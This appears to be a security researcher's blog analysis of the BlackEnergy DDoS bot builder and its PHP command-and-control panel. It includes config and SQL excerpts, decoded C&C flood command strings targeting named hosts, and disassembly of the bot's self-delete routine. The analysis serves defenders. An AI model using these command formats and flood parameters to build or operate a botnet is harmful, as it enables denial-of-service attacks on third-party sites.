BlackEnergy was very popular DDoS bot
which used to prevail couple of years back . This bot has been under
development and has evolved since quite some time with its successor named
Darkness bot with the similar abilities.This Bot has evolved with new
features continuously added to extend its malicious capabilities . Researchers
have been keeping an eye on this and analysis of the Command and Control(C&C)
traffic of the bot samples existing in the wild has revealed that this bot
should be a product of the Russian Cyber market , while the traces indicating the same have been found within the bot
executables as well.
This bot comes with a variety of DoSing capabilities and has been observed to be targeting the Russian Websites. Recently, during our Investigation, we managed to get access to the BlackEnergy builder toolkit which unlike previous available builder versions , comes with the option of building the polymorphic binaries to bypass AV detections and also includes anti-debugging features. The toolkit comes with the root directory www/ which includes the PHP scripts for controlling the Bot and other details such as MySQL database schemas which gives fair enough idea on the architecture of the Botnet.
This blog provides detailed analysis of the BlackEnergy bot builder toolkit. We will also examine the server side PHP scripts to understand the bot command and control channel. Additionally we will also analyze the DDoS traffic generated by the bot. Later part of this series also sheds some light over the recently emerging Darkness bot which is believed to be related to BlackEnergy and has overshadowed BlackEnergy in terms of its DoSing capabilities.
BlackEnergy DDoS Bot builder:
Above screenshot is of the builder
toolkit used to build the bot client which is then usually downloaded by
victims through drive-by-downloads or distributed through Spam e-mails.
Below are all the default parameters
used to build the bot client and as such most of the parameters are very well
self explanatory.
Host : C&C Server
communicating with the bot client .
Request
Rate : Specifies the time interval after
which new command should be fetched
from the C&C server.
Build
ID : Unique Build ID for each bot
. This will change every time the builder tool kit is invoked.
Default
Command : Command to execute if bot client cannot
connect to the C&C server.
Execute
after : Time after which command should be
executed.
Outfile :
Final bot client executable name
Default DDoS parameters
ICMP
Freq : No. of ICMP packets to send in
the attack.
ICMP
Size : Size of the ICMP packets in the
attack.
Syn
Freq : No. of SYN packets to send in
SYN flood
HTTP
Freq : No. of HTTP Request to send in
the HTTP flood
HTTP
Threads : No. of HTTP threads to create during
the attack.
TCP
/UDP Freq : No. of TCP / UDP packets to send during
TCP / UDP flood attack.
TCP
Size : Size of the TCP payload.
UDP
Size : Size of the UDP payload.
Spoof
IP’s : Boolean value to enable or
disable IP Spoofing during the flooding.
Use
Crypt traffic : May be used for encrypting the bot client
communication.
Use
polimorph exe :
Inserts different encryption routines to bypass AV detection.
and antidebug
After specifying all the configuration options, clicking on “Build” button will output the bot client which is then distributed through various means
Server Side Botnet Command and Control System :
The toolkit comes with the C&C server
side PHP scripts which interacts with the MYSQL database at the backend to
track the bot infections. We’ve observed the following files in the toolkit .
§
Auth.php
§ Config.php
§ Index.php
§ MySQL.php
§ Stat.php
§ db.sql
Readme.txt
Let’s understand the code in
each of these files and learn how the system works altogether.
The C&C system comes
with the basic HTTP password authentication scheme. Auth.php presents the Login/Password screen from where the Botnet
can be further controlled by the Bot Master.
Admin and MySQL Login details are saved
in the config.php file as below.
// íàñòðîéêè áàçû
$opt['mysql_host'] = "localhost";
$opt['mysql_user'] = "b0t2";
$opt['mysql_pass'] = "2413038";
$opt['mysql_base'] = "b0t2";
// ëîãèí è ïàññ ê àäìèíêå
$opt['admin_pass'] =
"admin";
$opt['admin_login'] = "132";
?>
Bot C&C system has a pretty simple
database schema with the SQL queries in the db.sql file. Following is an excerpt from that file.
--
-- Table structure for table `opt`
--
CREATE TABLE `opt` (
`name` varchar(255) NOT NULL,
`value` varchar(255) NOT NULL,
PRIMARY KEY (`name`)
);
“Opt“ table has the following name and
its default values which is displayed on the UI when index.php is accessed.
--
-- Dumping data for table `opt`
--
INSERT INTO `opt` (`name`, `value`)
VALUES ('attack_mode', '0'),
('cmd', 'wait'),
('http_freq', '100'),
('http_threads', '3'),
('icmp_freq', '10'),
('icmp_size', '2000'),
('max_sessions', '30'),
('spoof_ip', '0'),
('syn_freq', '10'),
('tcpudp_freq', '20'),
('tcp_size', '2000'),
('udp_size', '1000'),
('ufreq', '1');
-- --------------------------------------------------------
db.sql also has the important table structure , “stat” used for tracking the size of the botnet. All the data that is POSTed by the bot client is logged in this table along with the Build ID which is sent back by the bot client to the C&C system .
--
-- Table structure for table `stat`
--
CREATE TABLE `stat` (
`id` varchar(50) NOT NULL,
`addr` varchar(16) NOT NULL,
`time` int(11) NOT NULL,
`build` varchar(255) NOT NULL,
PRIMARY KEY (`id`)
);
Index.php is
the script that connects to the SQL database and fetches the statistics which
are displayed on the GUI. Following SQL queries are found in the index.php file
$r = db_query("SELECT * FROM
`opt`"); while ($f =
mysql_fetch_array($r)) $opt[$f['name']]
= $f['value'];
$r = db_query("SELECT COUNT(*) AS
`cnt` FROM `stat` WHERE
".time()."-`time`<".($opt['ufreq']*60)); $btotal
= intval(mysql_result($r, 0, 0));
$r = db_query("SELECT COUNT(*) AS
`cnt` FROM `stat` WHERE ".time()."-`time`<".(60*60)); $bhour
= intval(mysql_result($r, 0, 0));
$r = db_query("SELECT COUNT(*) AS
`cnt` FROM `stat` WHERE ".time()."-`time`<".(60*60*24)); $bday
= intval(mysql_result($r, 0, 0));
$r = db_query("SELECT COUNT(*) AS
`cnt` FROM `stat`");
$ball = intval(mysql_result($r, 0, 0)); $builds = array();
$sql = "SELECT COUNT(*) AS `cnt`, `build` FROM `stat` GROUP BY
`build`";
$r = db_query($sql);
Botnet Commands
We have reverse engineered C&C code on the bot client and have identified that it comes with 3 major type of commands. Arguments to these commands are also documented in the Readme.txt and cmdhelp.html files accompanying this package in the Russian language . During our analysis of the bot client binary , we’ve also found the 4th command which is not documented in the help files. Let ‘s understand each of the command and its binary code
A )
flood
:-
“Flood” command instructs the bot
client to initiate several different types of flooding attacks Arguments to
this command instructs the bot about the type of flood attack to generate along
with the other parameters as shown earlier Figure 1
. Arguments to the type of flooding attacks can be following:
-
ICMP
-
UDP
-
SYN
-
HTTP
-
Data
Flood command along with the arguments
and other parameters are sent by the server to the bot client in Base-64
encoded format . Below is an example of the decoded command indicating how the bot client is instructed to carry out
a TCP SYN flood on port 80:
4500;2000;100;1;0;30;500;500;200;1000;2000#flood
syn mail.ru 80 #10#xEN-XPSP1_80D1F15C
B
) stop :-
Stop
command instructs the bot client to temporarily stop DDoS floods for the specified
number of seconds
C
) die :-
Die command instructs the bot client to
delete itself from the infected system. It calls the ExitProcess API to
terminate the process and stop all DDoS activities.
PUSH 3
PUSH
_bot.15111484 ; ASCII "die"
MOV EAX, [ARG.1] ; _bot.
PUSH EAX
CALL _bot.151154C0
ADD ESP, 0C
TEST EAX, EAX
JNZ SHORT
_bot.15112C2A
CALL _bot.151127B0
PUSH
_bot.15116900 ; /FileName = ""
CALL DWORD PTR
DS:[<&KERNEL32.DeleteFileA>]
; \DeleteFileA
PUSH 0 ;
/ExitCode = 0
CALL DWORD PTR
DS:[<&KERNEL32.ExitProcess>]
; \ExitProcess
E ) wait:-
This command instructs the bot client to remain silent without performing any activity and contact the C&C server for new commands after the specified interval. Format of this command is as shown below :
4500;2000;100;1;0;30;500;500;200;1000;2000#wait#10#xEN-XPSP1_80D1F15C
This instructs the bot client to wait for 10 minutes before checking for new commands . This is exactly what can be figured out from the screenshot below
Network Communications:
BlackEnergy Bot client uses HTTP
protocol to communicate with the C&Cserver. It uses HTTP POST request to
stat.php page as shown in the "Architecture of Botnet" section. POST
request data is then logged into the “stat” table in the database primarily
used for tracking the bots.
The information sent by the bot-client
in the HTTP POST request message includes the ID and the build ID.
ID parameter is a combination of the SMB hostname and
the C:\ volume information of the infected machine. The code section below
shows how the ID parameter is built
Build_ID is the parameter which is
randomly generated by the bot builder and is probably used to track the botnet
infections.
In reponse, the C&C server replies
with the Base-64 encoded command as shown below.
The decoded command shows the
following:
4500;2000;100;1;0;30;500;500;200;1000;2000#wait#10#xEN-XPSP1_80D1F15C.
This shows the extent upto which the
DDoS parameters are configurable in this bot. All the parameters are present
even in the #wait# command. Likewise, variety of different DoS commands can be
given by C&C sever, few of which are listed below:
# flood syn www.abc.com 25#10#
# flood http www.xyz.com#20#
# flood udp;dns;syn;1.1.1.1#10#
# flood icmp 1.1.1.1#5#
A significant finding of our analysis
has shown that the toolkit that is used to build the bot client executable is Backdoored.
On execution of the toolkit, it opens a random port on the infected system in
the listening mode. Also , it is found sending significant system information
to the remote server . Below is the snapshot of Base-64 encoded traffic that we
captured when the toolkit was launched for building the bot.
Decoding above traffic shows the info that was being sent by this toolkit
In the next part of this blog , I will talk about Darkness , Another highly prevalent DDoS Botnet on the Internet.
Posts
